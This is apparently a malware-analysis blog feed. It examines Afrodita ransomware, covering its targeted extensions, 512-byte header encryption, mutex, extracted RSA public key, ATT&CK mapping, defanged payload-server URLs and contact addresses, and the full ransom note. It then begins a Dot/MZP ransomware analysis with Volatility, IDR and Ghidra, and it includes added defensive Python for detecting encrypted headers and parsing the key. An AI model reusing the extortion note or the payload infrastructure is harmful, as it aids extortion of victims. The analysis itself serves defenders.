class="no">.SQLITEDB</span><span class="p">,</span> <span class="no">.SQLITE3</span><span class="p">,</span> <span class="no">.SQLITE</span><span class="p">,</span> <span class="no">.SDF</span><span class="p">,</span> <span class="no">.SAS7BDAT</span><span class="p">,</span> <span class="no">.S3DB</span><span class="p">,</span> <span class="no">.RDB</span><span class="p">,</span> <span class="no">.PSAFE3</span><span class="p">,</span> <span class="no">.NYF</span><span class="p">,</span> <span class="no">.NX2</span><span class="p">,</span> <span class="no">.NX1</span><span class="p">,</span> <span 
class="no">.NSH</span><span class="p">,</span> <span class="no">.NSG</span><span class="p">,</span> <span class="no">.NSF</span><span class="p">,</span> <span class="no">.NSD</span><span class="p">,</span> <span class="no">.NS4</span><span class="p">,</span> <span class="no">.NS3</span><span class="p">,</span> <span class="no">.NS2</span><span class="p">,</span> <span class="no">.MYD</span><span class="p">,</span> <span class="no">.KPDX</span><span class="p">,</span> <span class="no">.KDBX</span><span class="p">,</span> <span class="no">.IDX</span><span class="p">,</span> <span class="no">.IBZ</span><span class="p">,</span> <span class="no">.IBD</span><span class="p">,</span> <span class="no">.FDB</span><span class="p">,</span> <span class="no">.ERBSQL</span><span class="p">,</span> <span class="no">.DB3</span><span class="p">,</span> <span class="no">.DB-JOURNAL</span><span class="p">,</span> <span class="no">.CLS</span><span class="p">,</span> <span class="no">.BDB</span><span class="p">,</span> <span class="no">.ADB</span><span class="p">,</span> <span class="no">.MONEYWELL</span><span class="p">,</span> <span class="no">.MMW</span><span class="p">,</span> <span class="no">.HBK</span><span class="p">,</span> <span class="no">.FFD</span><span class="p">,</span> <span class="no">.DGC</span><span class="p">,</span> <span class="no">.DDD</span><span class="p">,</span> <span class="no">.DAC</span><span class="p">,</span> <span class="no">.CFP</span><span class="p">,</span> <span class="no">.CDF</span><span class="p">,</span> <span class="no">.BPW</span><span class="p">,</span> <span class="no">.BGT</span><span class="p">,</span> <span class="no">.ACR</span><span class="p">,</span> <span class="no">.AC2</span><span class="p">,</span> <span class="no">.AB4</span><span class="p">,</span> <span class="no">.DJVU</span><span class="p">,</span> <span class="no">.SXM</span><span class="p">,</span> <span class="no">.ODF</span><span class="p">,</span> <span 
class="no">.MSG</span><span class="p">,</span> <span class="no">.STD</span><span class="p">,</span> <span class="no">.SXD</span><span class="p">,</span> <span class="no">.OTG</span><span class="p">,</span> <span class="no">.STI</span><span class="p">,</span> <span class="no">.SXI</span><span class="p">,</span> <span class="no">.OTP</span><span class="p">,</span> <span class="no">.ODG</span><span class="p">,</span> <span class="no">.STC</span><span class="p">,</span> <span class="no">.SXC</span><span class="p">,</span> <span class="no">.OTS</span><span class="p">,</span> <span class="no">.SXG</span><span class="p">,</span> <span class="no">.STW</span><span class="p">,</span> <span class="no">.SXW</span><span class="p">,</span> <span class="no">.OTH</span><span class="p">,</span> <span class="no">.OTT</span>
</pre></div>
<p><br/></p>
<p>The Ransomware encrypts the first 512 Bytes of the File Header which will render most filetypes useless. It does not leave any Signature in the data of the files and neither does it append a custom extension to the filename.</p>
<p><center><img alt="File" src="https://dissectingmalwa.re/img/afro-file.png"></center></p>
<p><br/></p>
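<p>Because only the first 512 bytes are overwritten and no marker or extension is added, a defender cannot triage by filename; what is left to check is whether a file's header still carries the magic bytes its extension implies and how random those 512 bytes look. The Python below is an added example (not part of the original post) that does exactly that over constructed sample files; the magic table and the 7.0 bits/byte entropy threshold are my assumptions.</p>

```python
import hashlib
import math
import os
from typing import Dict, Iterator, Optional, Tuple

HEADER_LEN = 512      # Afrodita overwrites only the first 512 bytes of each file
HIGH_ENTROPY = 7.0    # bits per byte; 512 bytes of ciphertext typically measure ~7.6

# Magic bytes for a handful of common types (constructed table, extend as needed).
MAGIC: Dict[str, Tuple[bytes, ...]] = {
    "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF",),
    "docx": (b"PK\x03\x04",), "xlsx": (b"PK\x03\x04",), "zip": (b"PK\x03\x04",),
    "exe": (b"MZ",), "dll": (b"MZ",),
    "sqlite": (b"SQLite format 3\x00",),
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_header(name: str, data: bytes) -> Dict[str, object]:
    """Classify a file by whether its first 512 bytes still look like its type."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    head = data[:HEADER_LEN]
    expected = MAGIC.get(ext)
    magic_ok: Optional[bool] = None
    if expected is not None:
        magic_ok = any(head.startswith(m) for m in expected)
    entropy = shannon_entropy(head)
    if magic_ok is False and entropy >= HIGH_ENTROPY:
        verdict = "header-encrypted"   # known type, magic gone, random-looking header
    elif magic_ok is False:
        verdict = "magic-mismatch"     # wrong magic but not random: maybe just misnamed
    elif magic_ok is None and entropy >= HIGH_ENTROPY:
        verdict = "suspicious"         # unknown type; entropy alone is weaker evidence
    else:
        verdict = "ok"
    return {"name": name, "magic_ok": magic_ok,
            "entropy": round(entropy, 2), "verdict": verdict}


def scan_directory(root: str) -> Iterator[Dict[str, object]]:
    """Walk `root` and yield a verdict per regular file, reading 512 bytes each."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    yield inspect_header(path, fh.read(HEADER_LEN))
            except OSError:
                continue


# --- constructed sample inputs (not real victim files) -----------------------
def _pseudo_random(n: int, seed: bytes = b"afrodita-demo") -> bytes:
    """Deterministic high-entropy filler standing in for the encrypted header."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


INTACT_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00"
               + b"\x00" * 500 + b"\xff\xd9")
ENCRYPTED_JPEG = _pseudo_random(HEADER_LEN) + INTACT_JPEG[HEADER_LEN:]
PLAIN_TEXT = b"quarterly report\n" * 40

if __name__ == "__main__":
    for name, blob in (("photo.jpg", INTACT_JPEG), ("photo.jpg", ENCRYPTED_JPEG),
                       ("notes.txt", PLAIN_TEXT)):
        print(inspect_header(name, blob))
```

A real JPEG body is compressed and fairly random too, so the magic mismatch is the primary signal here and entropy only corroborates it.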
<p>Another IOC: It creates the following Mutex: <em>835821AM3218SAZ</em></p>
<p><center><img alt="Mutex" src="https://dissectingmalwa.re/img/afro-mutex.png"></center></p>
<p><br/></p>
<h2><strong>Update 10.01.2020:</strong></h2>
<p>The criminals obviously failed to properly display the key / victim ID in the ransom note. This was also a problem on my end, because the broken encoding killed this blog's Atom/RSS feed :D To resolve this I removed the malformed section from this page. If you want to have a look at the original note plus a couple of encrypted JPEGs, download the <a href="https://dissectingmalwa.re/other/afrodita-samplefiles.zip">zip</a> file.</p>
<p>This malware family also isn't as new as I originally thought. According to Michael Gillespie, the MalwareHunterTeam found the first maldoc in late November. A few days later Check Point Research found it as well:</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/Afrodita?src=hash&ref_src=twsrc%5Etfw">#Afrodita</a> Ransomware, appears to be a new strain.<br>Targeting businesses in Croatia via legitimate looking Excel spreadsheets.<br><br>Subject: “Poziv na placanje”<br>DZ: http://content-delivery[.]in/verynice.jpg<br>XLSM: 597ec6887f3bcdc5077939bdf1fb69f1<br>DLL: ebacbff99234887d9f27719e48bafe59 <a href="https://t.co/IM0h4fHUDT">pic.twitter.com/IM0h4fHUDT</a></p>— Check Point Research (@_CPResearch_) <a href="https://twitter.com/_CPResearch_/status/1201957880909484033?ref_src=twsrc%5Etfw">December 3, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p><br/></p>
<p>Today Michael also asked if anyone was able to parse the <em>main-public.key</em> because the format seems off. I extracted it from the binary:</p>
<p><center><img alt="main-public.key extracted from the binary" src="https://dissectingmalwa.re/img/afro-mainpub.png"></center></p>
<p><br/></p>
<p>A quick look at the <a href="https://www.cryptopp.com/wiki/Keys_and_Formats#Hex_and_Base64_Encoding">CryptoPP Wiki</a> revealed that the key is raw DER-encoded ASN.1 (you can recognise it by the leading bytes 30 82: a SEQUENCE tag followed by a two-byte length). Running it through an online ASN.1 decoder (<a href="https://lapo.it/asn1js/">Link</a>) yields the public key:</p>
<p><center><img alt="Decoded ASN.1 structure of the public key" src="https://dissectingmalwa.re/img/afro.key.png"></center></p>
<p><br/></p>
<div class="highlight"><pre><span></span><span class="o">-----</span><span class="nv">BEGIN</span> <span class="nv">RSA</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
<span class="nv">MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAxs2xkeHRygZBupFc2</span><span class="o">+</span><span class="nv">Z</span><span class="o">//</span><span class="nv">dLnMbWR</span><span class="o">/</span><span class="nv">NiXQBmP</span>
<span class="mi">10</span><span class="nv">Q7nbG</span><span class="o">/</span><span class="mi">5</span><span class="nv">jaDcik</span><span class="o">+</span><span class="nv">eGDh2zz6XYr2Ur</span><span class="o">+</span><span class="nv">sS1yD4</span><span class="o">/</span><span class="mi">1</span><span class="nv">XQeIZ</span><span class="o">/</span><span class="nv">zjcjC43H090nUlELTtq9ED8LqevnrOaMQFy</span>
<span class="nv">UIhQU</span><span class="o">+</span><span class="nv">plY5eJd6KuW2dCdv8n0uBDAzBQRnpjJr0AmnkEzRGD5XCoYtrR061kBAerXQjBxhQSnsMWxE2R</span>
<span class="nv">excq38tgf</span><span class="o">/</span><span class="nv">szXPaoSD1vsSmIwXbc3nTkadYPfjLu6aWWYmikWIi3z</span><span class="o">+</span><span class="nv">RoUOm7OhmaOu</span><span class="o">+</span><span class="nv">azPCPBjHc93cB</span>
<span class="nv">KsLnxzSHiKRFN4cd0Tu</span><span class="o">+</span><span class="nv">uvehGl1</span><span class="o">+</span><span class="nv">v3CK0Zj</span><span class="o">+</span><span class="nv">nr5OfeNjMGYQj80t0</span><span class="o">+</span><span class="nv">AqnDQkzwdA</span><span class="o">/</span><span class="nv">wIBEQ</span><span class="o">==</span>
<span class="o">-----</span><span class="k">END</span> <span class="nv">RSA</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
</pre></div>
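<p>As an added example (not code from the post), the Python below walks the DER of the PEM above with a minimal tag-length-value reader and reports what it really contains: the body is a SubjectPublicKeyInfo (AlgorithmIdentifier plus a BIT STRING wrapping the RSAPublicKey), not the bare PKCS#1 RSAPublicKey that the "RSA PUBLIC KEY" label promises, which is one reason a parser keyed on the label rejects it. The label-to-format table is my assumption; the PEM is embedded verbatim so the script runs offline.</p>

```python
import base64
import re
from typing import Dict, Tuple

# The main-public.key PEM exactly as shown above, embedded for offline parsing.
AFRODITA_PEM = """-----BEGIN RSA PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAxs2xkeHRygZBupFc2+Z//dLnMbWR/NiXQBmP
10Q7nbG/5jaDcik+eGDh2zz6XYr2Ur+sS1yD4/1XQeIZ/zjcjC43H090nUlELTtq9ED8LqevnrOaMQFy
UIhQU+plY5eJd6KuW2dCdv8n0uBDAzBQRnpjJr0AmnkEzRGD5XCoYtrR061kBAerXQjBxhQSnsMWxE2R
excq38tgf/szXPaoSD1vsSmIwXbc3nTkadYPfjLu6aWWYmikWIi3z+RoUOm7OhmaOu+azPCPBjHc93cB
KsLnxzSHiKRFN4cd0Tu+uvehGl1+v3CK0Zj+nr5OfeNjMGYQj80t0+AqnDQkzwdA/wIBEQ==
-----END RSA PUBLIC KEY-----"""

RSA_ENCRYPTION_OID = "1.2.840.113549.1.1.1"
# Which PEM label each DER structure is conventionally wrapped in (assumed table).
PEM_LABEL_FOR_FORMAT = {"RSAPublicKey": "RSA PUBLIC KEY",
                        "SubjectPublicKeyInfo": "PUBLIC KEY"}


def pem_to_der(pem: str) -> Tuple[str, bytes]:
    """Return (label from the BEGIN line, decoded DER bytes)."""
    label = re.search(r"-----BEGIN ([^-]+)-----", pem).group(1)
    body = "".join(line.strip() for line in pem.splitlines()
                   if not line.startswith("-----"))
    return label, base64.b64decode(body)


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER tag-length-value at `pos`; return (tag, value, next position)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                 # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("DER length runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw: bytes) -> str:
    """Decode OID content bytes to dotted form (first byte packs the first two arcs)."""
    arcs = [raw[0] // 40, raw[0] % 40]
    value = 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def parse_rsa_public_key(der: bytes) -> Tuple[int, int]:
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    tag, seq, _ = read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("RSAPublicKey must start with a SEQUENCE")
    tag_n, n_bytes, pos = read_tlv(seq, 0)
    tag_e, e_bytes, _ = read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def parse_public_key(pem: str) -> Dict[str, object]:
    """Accept bare RSAPublicKey or SubjectPublicKeyInfo DER and report which it is."""
    label, der = pem_to_der(pem)
    if der[:2] != b"\x30\x82":
        raise ValueError("expected a SEQUENCE with a two-byte length (hex 30 82)")
    _, seq, _ = read_tlv(der, 0)
    first_tag, first, pos = read_tlv(seq, 0)
    if first_tag == 0x30:
        # SubjectPublicKeyInfo ::= SEQUENCE { AlgorithmIdentifier, BIT STRING }
        fmt = "SubjectPublicKeyInfo"
        _, oid_raw, _ = read_tlv(first, 0)
        if decode_oid(oid_raw) != RSA_ENCRYPTION_OID:
            raise ValueError("not an rsaEncryption key")
        bs_tag, bit_string, _ = read_tlv(seq, pos)
        if bs_tag != 0x03 or bit_string[0] != 0:   # first byte = unused-bit count
            raise ValueError("malformed subjectPublicKey BIT STRING")
        n, e = parse_rsa_public_key(bit_string[1:])
    elif first_tag == 0x02:
        fmt = "RSAPublicKey"
        n, e = parse_rsa_public_key(der)
    else:
        raise ValueError("unrecognised structure")
    return {"label": label, "format": fmt,
            "label_matches": PEM_LABEL_FOR_FORMAT[fmt] == label,
            "modulus_bits": n.bit_length(), "exponent": e, "modulus": n}


if __name__ == "__main__":
    info = parse_public_key(AFRODITA_PEM)
    print({k: v for k, v in info.items() if k != "modulus"})
```

The 2048-bit modulus it reports matches the "RSA2048" claim in the ransom note.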
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1114</em> --> Email Collection --> Collection</p>
<p><br/></p>
<h2><em>IOCs</em></h2>
<h3>Afrodita</h3>
<div class="highlight"><pre><span></span><span class="n">notnice</span><span class="p">.</span><span class="n">jpg</span> <span class="c1">--> SHA256: 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">6144</span><span class="p">:</span><span class="n">EXrm0zIiAhjC7Cqa5ZhiIJDQ13Xdksm1Cx2tJk</span><span class="p">:</span><span class="n">EbNQaCq6iIJcdksmJtJ</span>
</pre></div>
<h3>Payload Servers</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">riskpartner</span><span class="p">[.]</span><span class="n">hr</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">notnice</span><span class="p">.</span><span class="n">jpg</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">content</span><span class="o">-</span><span class="n">delivery</span><span class="p">[.]</span><span class="k">in</span><span class="o">/</span><span class="n">verynice</span><span class="p">.</span><span class="n">jpg</span>
</pre></div>
<h3>E-Mail Addresses / Contact</h3>
<div class="highlight"><pre><span></span><span class="n">afroditateam</span><span class="nv">@tutanota</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">afroditasupport</span><span class="nv">@mail2tor</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="nl">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">t</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">me</span><span class="o">/</span><span class="n">RecoverySupport</span><span class="w"></span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="o">~~~</span> <span class="nv">Greetings</span> <span class="o">~~~</span>
[<span class="o">+</span>] <span class="nv">What</span> <span class="nv">has</span> <span class="nv">happened</span>? [<span class="o">+</span>]
<span class="nv">Your</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span>, <span class="nv">and</span> <span class="nv">currently</span> <span class="nv">unavailable</span>. <span class="nv">You</span> <span class="nv">are</span> <span class="nv">free</span> <span class="nv">to</span> <span class="nv">check</span>.
<span class="nv">Every</span> <span class="nv">file</span> <span class="nv">is</span> <span class="nv">recoverable</span> <span class="nv">by</span> <span class="nv">following</span> <span class="nv">our</span> <span class="nv">instructions</span> <span class="nv">below</span>.
<span class="nv">Encryption</span> <span class="nv">algorithms</span> <span class="nv">used</span>: <span class="nv">AES256</span><span class="ss">(</span><span class="nv">CBC</span><span class="ss">)</span> <span class="o">+</span> <span class="nv">RSA2048</span> <span class="ss">(</span><span class="nv">military</span><span class="o">/</span><span class="nv">government</span> <span class="nv">grade</span><span class="ss">)</span>.
[<span class="o">+</span>] <span class="nv">Guarantees</span>? [<span class="o">+</span>]
<span class="nv">This</span> <span class="nv">is</span> <span class="nv">our</span> <span class="nv">daily</span> <span class="nv">job</span>. <span class="nv">We</span> <span class="nv">are</span> <span class="nv">not</span> <span class="nv">here</span> <span class="nv">to</span> <span class="nv">lie</span> <span class="nv">to</span> <span class="nv">you</span> <span class="o">-</span> <span class="nv">as</span> <span class="nv">you</span> <span class="nv">are</span> <span class="mi">1</span> <span class="nv">of</span> <span class="mi">10000</span><span class="s1">'</span><span class="s">s.</span>
<span class="nv">Our</span> <span class="nv">only</span> <span class="nv">interest</span> <span class="nv">is</span> <span class="nv">in</span> <span class="nv">us</span> <span class="nv">getting</span> <span class="nv">payed</span> <span class="nv">and</span> <span class="nv">you</span> <span class="nv">getting</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">back</span>.
<span class="k">If</span> <span class="nv">we</span> <span class="nv">were</span> <span class="nv">not</span> <span class="nv">able</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">the</span> <span class="nv">data</span>, <span class="nv">other</span> <span class="nv">people</span> <span class="nv">in</span> <span class="nv">same</span> <span class="nv">situation</span> <span class="nv">as</span> <span class="nv">you</span>
<span class="nv">wouldn</span><span class="s1">'</span><span class="s">t trust us and that would be bad for our buissness --</span>
<span class="nv">So</span> <span class="nv">it</span><span class="s1">'</span><span class="s">s not in our interest.</span>
<span class="nv">To</span> <span class="nv">prove</span> <span class="nv">our</span> <span class="nv">ability</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">you</span> <span class="nv">have</span> <span class="mi">1</span> <span class="nv">file</span> <span class="nv">free</span> <span class="nv">decryption</span>.
<span class="k">If</span> <span class="nv">you</span> <span class="nv">don</span><span class="s1">'</span><span class="s">t want to pay the fee for bringing files back that</span><span class="s1">'</span><span class="nv">s</span> <span class="nv">okey</span>,
<span class="nv">but</span> <span class="nv">remeber</span> <span class="nv">that</span> <span class="nv">you</span> <span class="nv">will</span> <span class="nv">lose</span> <span class="nv">a</span> <span class="nv">lot</span> <span class="nv">of</span> <span class="nv">time</span> <span class="o">-</span> <span class="nv">and</span> <span class="nv">time</span> <span class="nv">is</span> <span class="nv">money</span>.
<span class="nv">Don</span><span class="s1">'</span><span class="s">t waste your time and money trying to recover files using some file</span>
<span class="nv">recovery</span> <span class="s2">"</span><span class="s">experts</span><span class="s2">"</span>, <span class="nv">we</span> <span class="nv">have</span> <span class="nv">your</span> <span class="nv">private</span> <span class="nv">key</span> <span class="o">-</span> <span class="nv">only</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">get</span> <span class="nv">the</span> <span class="nv">files</span> <span class="nv">back</span>.
<span class="nv">With</span> <span class="nv">our</span> <span class="nv">service</span> <span class="nv">you</span> <span class="nv">can</span> <span class="nv">go</span> <span class="nv">back</span> <span class="nv">to</span> <span class="nv">original</span> <span class="nv">state</span> <span class="nv">in</span> <span class="nv">less</span> <span class="k">then</span> <span class="mi">30</span> <span class="nv">minutes</span>.
[<span class="o">+</span>] <span class="nv">Service</span> [<span class="o">+</span>]
<span class="k">If</span> <span class="nv">you</span> <span class="nv">decided</span> <span class="nv">to</span> <span class="nv">use</span> <span class="nv">our</span> <span class="nv">service</span> <span class="nv">please</span> <span class="nv">follow</span> <span class="nv">instructions</span> <span class="nv">below</span>.
<span class="nv">Contact</span> <span class="nv">us</span>:
<span class="nv">Install</span> <span class="nv">Telegram</span><span class="ss">(</span><span class="nv">available</span> <span class="k">for</span> <span class="nv">Windows</span>,<span class="nv">Android</span>,<span class="nv">iOS</span><span class="ss">)</span> <span class="nv">and</span> <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">on</span> <span class="nv">chat</span>:
<span class="nv">Telegram</span> <span class="nv">contact</span>: <span class="nv">https</span>:<span class="o">//</span><span class="nv">t</span>.<span class="nv">me</span><span class="o">/</span><span class="nv">RecoverySupport</span>
<span class="nv">Also</span> <span class="nv">available</span> <span class="nv">at</span> <span class="nv">email</span> <span class="nv">afroditateam</span>@<span class="nv">tutanota</span>.<span class="nv">com</span> <span class="nv">cc</span>: <span class="nv">afroditasupport</span>@<span class="nv">mail2tor</span>.<span class="nv">com</span>
<span class="nv">Make</span> <span class="nv">sure</span> <span class="nv">you</span> <span class="nv">are</span> <span class="nv">talking</span> <span class="nv">with</span> <span class="nv">us</span> <span class="nv">and</span> <span class="nv">not</span> <span class="nv">impostor</span> <span class="nv">by</span> <span class="nv">requiring</span> <span class="nv">free</span> <span class="mi">1</span> <span class="nv">file</span> <span class="nv">decryption</span> <span class="nv">to</span> <span class="nv">make</span> <span class="nv">sure</span> <span class="nv">we</span> <span class="nv">CAN</span> <span class="nv">decrypt</span><span class="o">!!</span>
[<span class="nv">Removed</span> <span class="nv">victim</span> <span class="nv">ID</span> <span class="nv">because</span> <span class="nv">it</span> <span class="nv">breaks</span> <span class="nv">the</span> <span class="nv">RSS</span> <span class="nv">Feed</span> :<span class="nv">D</span>]
</pre></div>
<p><br/></p>
<p>Title Image by <a href="https://de.m.wikipedia.org/wiki/Datei:Shrek_with_wife_-_Ogr%C3%B3d_bajek_w_Mi%C4%99dzyg%C3%B3rzu.jpg">Robert Drózd</a>, modified</p>"Nice decorating. Let me guess, Satan?" - Dot / MZP Ransomware2020-01-02T00:00:00+01:002020-01-02T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-01-02:/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html<p>Happy new year y'all. And with it there's new Ransomware to analyze, so come along for the ride :D</p><p><center><img alt="Dot Header" height="380px" width ="365px" src="https://dissectingmalwa.re/img/dot-logo.png"></center></p>
<p><br/></p>
<p>Dot "MZP" Ransomware @ <a href="https://app.any.run/tasks/56248422-b327-4226-8a79-3155e24b999d/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67?environmentId=100">HybridAnalysis</a>
--> <code>sha256 bebf5c12e35029e21c9cca1da53eb43e893f9521435a246ea991bcced2fabe67</code></p>
<p>This sample was first discovered by Amigo-A and AkhmedTaia on the 31st of December 2019. AV detections and ransom note contents didn't seem to match any previously known strain. The note is delivered via a <em>.txt</em> file with a strange numeric victim ID and only one contact email address. The extension appended to encrypted files seems to be a random 8-character lowercase string.</p>
<p><br/></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">New <a href="https://twitter.com/hashtag/MZP?src=hash&ref_src=twsrc%5Etfw">#MZP</a> <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a><a href="https://t.co/YCY8NXzJZw">https://t.co/YCY8NXzJZw</a><br>It seems nothing special, but early AV-detections is uninformative. <br>Thanks to <a href="https://twitter.com/AkhmedTaia?ref_src=twsrc%5Etfw">@AkhmedTaia</a> <a href="https://t.co/qS1YapH8jW">pic.twitter.com/qS1YapH8jW</a></p>— Amigo-A (@Amigo_A_) <a href="https://twitter.com/Amigo_A_/status/1212136864393637888?ref_src=twsrc%5Etfw">December 31, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p><br/></p>
<p>Because of the "MZP" (4D 5A 50) magic at the beginning of the executable file they dubbed the malware "MZP" Ransomware. As I explained before with the MZRevenge/MaMo Ransomware, the "P" after the MZ magic string indicates that the binary was built with Borland Delphi; the <em>P</em> stands for Pascal (the programming language).</p>
<p><center><img alt="File Icon" src="https://dissectingmalwa.re/img/dot-mzp.png"></center></p>
<p><br/></p>
<p>In my Opinion the Name "MZP Ransomware" is too generic to be useful for future reference, so I'd like to propose the name "Dot Ransomware" because of the File Icon found with the Malware Samples. It shows the character "Dot" from the Warner Bros Cartoon Series "Animaniacs" popular in the mid-1990s.</p>
<p><center><img alt="File Icon" src="https://dissectingmalwa.re/img/dot-icon.png"></center></p>
<p><br/></p>
<p>Two things to note about the Output of "Detect it easy" for this sample: </p>
<ol>
<li>
<p>It confirms that the Ransomware was built with Borland Delphi (Version 4).</p>
</li>
<li>
<p>This sample seems to be packed with UPX 3.91. Running <code>upx -d 01.exe</code> yields the unpacked version. The hash sums can be found in the IOC section down below.</p>
</li>
</ol>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/dot-die.png"></center></p>
<p><br/></p>
<p>Let's try something new :D Up until now I pretty much neglected memory dump analysis as a whole, but since I attended the Volatility workshop at 36c3 I noticed what I'm missing out on. With <code>volatility -f IE9WIN7-20200102-171509.dmp --profile=Win7SP1x86_24000 pstree</code> we can dump the process tree at the time of the capture. We can see that 01.exe is running as a child process of explorer.exe.</p>
<p><center><img alt="Volatility pstree output" src="https://dissectingmalwa.re/img/dot-pstree.png"></center></p>
<p><br/></p>
<p>With the <em>privs</em> plugin Volatility can show which process privileges are present, enabled, and/or enabled by default. Below you can see a screencapture of the output for the Ransomware. The Plugins <em>cmdscan</em> and <em>consoles</em> sadly did not return any output for 01.exe.</p>
<p><center><img alt="Volatility privs output" src="https://dissectingmalwa.re/img/dot-privs.png"></center></p>
<p><br/></p>
<p>Let's check out what IDR (<a href="https://github.com/crypto2011/IDR">Interactive Delphi Reconstructor</a>) can tell us about the binary. First off: Strings.</p>
<p><center><img alt="IDR Strings" src="https://dissectingmalwa.re/img/dot-strings.png"></center></p>
<p>The first string related to the compiler tells us that the criminals likely used <em>HiASM</em> (an old Russian IDE for Delphi development) to build the malware. The DLL mentioned below, <em>comctl32.dll</em>, is often targeted for UAC bypasses. It also seems to track mouse events to some extent; this could either be an evasion mechanism or entropy collection (the first option is a lot more plausible). <strong>"HOW TO RESTORE ENCRYPTED FILES.txt"</strong> is the filename of the dropped ransom note, although I'm not sure about the use of <strong>"DECRYPT FILES.txt"</strong>, since this file was not present on any infected system (speculation: does it select one out of multiple filenames to make tracking more difficult?). Lastly we have a file path and a string that looks like the criminal dragged his face across the keyboard once.</p>
<p><br/></p>
<p>Alright, let's move along. Because Delphi is notoriously weird and difficult to disassemble/decompile, it is time to try a new tool again. Today I will be using Ghidra with <em>Dhrake</em>, developed by Jesko Hüttenhain. You can find the Git repository below, and if you would like to know more about the inner workings of the two scripts you should definitely read his article about them <a href="https://blag.nullteilerfrei.de/2019/12/23/reverse-engineering-delphi-binaries-in-ghidra-with-dhrake/">here</a>.</p>
<p><strong>A short tl;dr</strong>: Dhrake is short for "Delphi hand rake" and tries to fix missing symbols and borked function signatures by matching them to the symbols extracted with IDR beforehand. This will not only clean up the decompilation results in Ghidra but also automatically create structs and virtual method tables for you instead of you doing it by hand (as if reversing Delphi wasn't already painful enough). It's pretty cool, give it a try!</p>
<p><br/></p>
<p><center><div class="github-card" data-github="huettenhain/dhrake" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><br/></p>
<p>The first step to success (lol who am I kidding) is firing up Ghidra and loading the sample. Tell it to auto-analyze the file.</p>
<p><center><img alt="Ghidra Analysis" src="https://dissectingmalwa.re/img/dot-ghidra.png"></center></p>
<p><br/></p>
<p>Next we need to extract the <em>.IDC</em> Symbol file with the Help of IDR. For this it is sufficient to clone the Git Repo and paste the Knowledge Base files from the Dropbox linked at the end of the Readme into it. After that is done just run IDR.exe, import the binary and choose <em>IDC Generator</em> under <strong>Tools</strong>.</p>
